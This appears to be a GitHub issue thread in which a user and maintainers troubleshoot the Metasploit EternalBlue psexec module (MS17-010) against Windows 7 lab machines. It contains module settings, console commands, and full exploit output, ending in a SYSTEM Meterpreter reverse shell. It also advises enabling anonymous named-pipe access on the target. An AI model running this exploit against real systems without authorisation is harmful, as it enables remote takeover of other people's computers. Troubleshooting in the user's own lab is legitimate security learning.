wvu
commented
6 years ago What named pipes did the exploit find?
Closed elibr1212 closed 6 years ago
wvu
commented
6 years ago What named pipes did the exploit find?
wvu
commented
6 years ago Actually, paste all your output.
elibr1212
commented
6 years ago Module options (exploit/windows/smb/ms17_010_psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
DBGTRACE true yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
RHOST 10.0.0.28 yes The target address
RPORT 445 yes The Target port
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser berkhim no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.0.0.14 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(windows/smb/ms17_010_psexec) > set rhost 10.0.0.28
rhost => 10.0.0.28
msf exploit(windows/smb/ms17_010_psexec) > run
[*] Started reverse TCP handler on 10.0.0.14:4444
[-] 10.0.0.28:445 - Rex::Proto::SMB::Exceptions::LoginError: Login Failed: The server responded with error: STATUS_ACCOUNT_RESTRICTION (Command=115 WordCount=0)
[*] Exploit completed, but no session was created.
i use kali ..
and i not set the smbpass
i set the smbuser
and the windows victem is windows 7 
Auxilus
commented
6 years ago Is setting SMBUser causing the problem? Is that why it's giving STATUS_ACCOUNT_RESTRICTION
Also does the exploit work without setting SMBUser ?
Auxilus
commented
6 years ago STATUS_ACCOUNT_RESTRICTION - Local Security Policy/Accounts: Limit local account use of blank passwords to computer.
elibr1212
commented
6 years ago Also does the exploit work without setting SMBUser ?
In Windows XP I tried without setting a username and password and it succeeded But on Windows 7 it did not work for me and I saw in another video that it did work Link: https://www.youtube.com/watch?v=Wx8mLdPL-s0&t=17s That's why it's confusing.
Auxilus
commented
6 years ago What error does it give when you try it without setting SMBUser?
elibr1212
commented
6 years ago msf > use exploit/windows/smb/ms17_010_psexec msf exploit(windows/smb/ms17_010_psexec) > set rhost 10.0.0.28 rhost => 10.0.0.28 msf exploit(windows/smb/ms17_010_psexec) > run
[] Started reverse TCP handler on 10.0.0.15:4444 [] 10.0.0.28:445 - Target OS: Windows 7 Ultimate 7601 Service Pack 1 [-] 10.0.0.28:445 - Unable to find accessible named pipe! [*] Exploit completed, but no session was created.``
Auxilus
commented
6 years ago Have you checked if the target is vulnerable to ms17_010?
Auxilus
commented
6 years ago Detecting an accessible named point is I think the entry point, if exploit doesn't find it, then I'm afraid it won't work at all..
elibr1212
commented
6 years ago yes . Yes it's my little brothers' computer and I'm learning with it So I opened Port 445 from the beginning msf> clear [*] exec: clear
msf> use auxiliary / scanner / smb / smb_ms17_010 msf proxy (scanner / smb / smb_ms17_010)> set rhosts 10.0.0.28 rhosts => 10.0.0.28 msf auxiliary (scanner / smb / smb_ms17_010)> run
[+] 10.0.0.28:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit) [] Scanned 1 of 1 hosts (100% complete) [] Auxiliary module execution completed msf auxiliary (scanner / smb / smb_ms17_010)>``
wvu
commented
6 years ago set VERBOSE true and try again, @elibr1212.
elibr1212
commented
6 years ago msf exploit(windows/smb/ms17_010_psexec) > set rhost 10.0.0.28
rhost => 10.0.0.28
smsf exploit(windows/smb/ms17_010_psexec) > set dbgtrace 1
dbgtrace => true
msf exploit(windows/smb/ms17_010_psexec) > set verbose 1
verbose => true
msf exploit(windows/smb/ms17_010_psexec) > run
[*] Started reverse TCP handler on 10.0.0.15:4444
[*] 10.0.0.28:445 - Target OS: Windows 7 Ultimate 7601 Service Pack 1
[-] 10.0.0.28:445 - Inaccessible named pipe: netlogon - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: lsarpc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: samr - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: browser - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: atsvc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: DAV RPC SERVICE - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: epmapper - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: eventlog - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: InitShutdown - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: keysvc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: lsass - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: LSM_API_service - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: ntsvcs - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: plugplay - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: protected_storage - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: router - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: SapiServerPipeS-1-5-5-0-70123 - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: scerpc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: srvsvc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: tapsrv - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: trkwks - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: W32TIME_ALT - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: wkssvc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: db2remotecmd - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Unable to find accessible named pipe!
[*] Exploit completed, but no session was created.
msf exploit(windows/smb/ms17_010_psexec) >
``
wvu
commented
6 years ago What named pipes did the exploit find?
So, going back to the original question, it looks like you have no accessible named pipes. You either need creds, anonymous access, or to find a different pipe you have access to.
elibr1212
commented
6 years ago You either need creds, anonymous access how do I do it?
wvu
commented
6 years ago If you control the box you're testing, you can use known creds or enable anonymous access via https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-access-named-pipes-that-can-be-accessed-anonymously.
Auxilus
commented
6 years ago @wvu-r7 do we need to add named pipes like COMNAP, COMNODE described in above article to the list?
elibr1212
commented
6 years ago "If you control the box you're testing" yes Now I checked the computer And I see that the sharing service is not working And that I try to run it in "services" It does not let turn on the render .. And I'll look at what you sent. Well done for the work you do! it's not taken for granted You are champions
wvu
commented
6 years ago Probably not if they're for IBM mainframes. :P
elibr1212
commented
6 years ago I opened a virtual machine (windows 7 x86) now lol And it worked [] Started reverse TCP handler on 10.0.0.15:4444 [] 10.0.0.21:445 - Target OS: Windows 7 Ultimate 7601 Service Pack 1 [-] 10.0.0.21:445 - Inaccessible named pipe: netlogon - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0) [-] 10.0.0.21:445 - Inaccessible named pipe: lsarpc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0) [-] 10.0.0.21:445 - Inaccessible named pipe: samr - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0) [-] 10.0.0.21:445 - Inaccessible named pipe: browser - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0) [-] 10.0.0.21:445 - Inaccessible named pipe: atsvc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0) [-] 10.0.0.21:445 - Inaccessible named pipe: DAV RPC SERVICE - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0) [] 10.0.0.21:445 - Connected to named pipe: epmapper [] 10.0.0.21:445 - Frag pool info leak: arch=x86, size=0x8 [] 10.0.0.21:445 - GROOM_POOL_SIZE: 0x5020 [] 10.0.0.21:445 - BRIDE_TRANS_SIZE: 0xfc8 [] 10.0.0.21:445 - Attempting leak #0 [] 10.0.0.21:445 - CONNECTION: 0x872c5010 [] 10.0.0.21:445 - SESSION: 0x9e286058 [] 10.0.0.21:445 - FLINK: 0x97353028 [] 10.0.0.21:445 - InParam: 0x9e2c20dc [] 10.0.0.21:445 - MID: 0xb03 [-] 10.0.0.21:445 - Unexpected Flink alignment, delta: -6f6ffd8 [] 10.0.0.21:445 - Align transaction and leak failed, attempt #0 [] 10.0.0.21:445 - Attempting leak #1 [] 10.0.0.21:445 - CONNECTION: 0x872c5010 [] 10.0.0.21:445 - SESSION: 0x9e286058 [] 10.0.0.21:445 - FLINK: 0x9e2d4050 [] 10.0.0.21:445 - InParam: 0x9e2ce0dc [] 10.0.0.21:445 - MID: 0xb03 [] 10.0.0.21:445 - Leaked connection struct (0x872c5010), performing WriteAndX type confusion [] 10.0.0.21:445 - Control of groom transaction [] 10.0.0.21:445 - Built a write-what-where primitive... [] 10.0.0.21:445 - Overwrote IsNullSession = 0, IsAdmin = 1 at 0x9e2860ee [] 10.0.0.21:445 - Session Data: 0a02b2000000000058d4dd8501000000000000005cf775935cf775930800000010502c87000000000861289e020002000861289e00000000ba12ead606c6d30141b92cd706c6d301ffffffffffffff7fffffffffffffff7f00000000000000000000000000000000000000000000000000000000000000000000000000000000d837289e041102000108000000000000010000000000000100000000000000000d0000000000000000000000000000002e0030003000300037003b003b003b00530059002900280041003b003b0030007800660030003000300037003b003b003b00420041002900280041003b003b003000780032003b003b003b0053004f00 [] 10.0.0.21:445 - session dat len = 256 [] 10.0.0.21:445 - Session ctx offset = 80 [] 10.0.0.21:445 - Session ctx data = d837289e041102000108000000000000010000000000000100000000000000000d0000000000000000000000000000002e0030003000300037003b003b003b00530059002900280041003b003b0030007800660030003000300037003b003b003b00420041002900280041003b003b003000780032003b003b003b0053004f00 [] 10.0.0.21:445 - secCtxAddr: 9e2837d8 [] 10.0.0.21:445 - Reading secCtxData from 9e2837d8 [] 10.0.0.21:445 - Read data from secCtx: 2a021c000300000003000000180db093000000000000000000000000 [] 10.0.0.21:445 - Overwrote token SID security context with fake context [+] 10.0.0.21:445 - Overwrite complete... SYSTEM session obtained! [] 10.0.0.21:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe [] 10.0.0.21:445 - PowerShell found [] 10.0.0.21:445 - Selecting PowerShell target [] 10.0.0.21:445 - Powershell command length: 2404 [] 10.0.0.21:445 - Executing the payload... [] 10.0.0.21:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.0.0.21[\svcctl] ... [] 10.0.0.21:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.0.0.21[\svcctl] ... [] 10.0.0.21:445 - Obtaining a service manager handle... [] 10.0.0.21:445 - Creating the service... [+] 10.0.0.21:445 - Successfully created the service [] 10.0.0.21:445 - Starting the service... [+] 10.0.0.21:445 - Service start timed out, OK if running a command or non-service executable... [] 10.0.0.21:445 - Removing the service... [+] 10.0.0.21:445 - Successfully removed the service [] 10.0.0.21:445 - Closing service handle... [] Sending stage (179779 bytes) to 10.0.0.21 [+] 10.0.0.21:445 - SYSTEM session cleaned up. [*] Meterpreter session 2 opened (10.0.0.15:4444 -> 10.0.0.21:49170) at 2018-03-27 23:04:42 +0300
meterpreter > sysinfo Computer : WIN-IUAS33RLC03 OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x86 System Language : he_IL Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows meterpreter >
wvu
commented
6 years ago Did you read the module doc? info -d may have been helpful.
elibr1212
commented
6 years ago I did it through the anonymity as you said .. And yes thanks.
Why am I just there and the user is showing me this? I understood that it was possible without a password .. How can you read even an article on the script how to use it?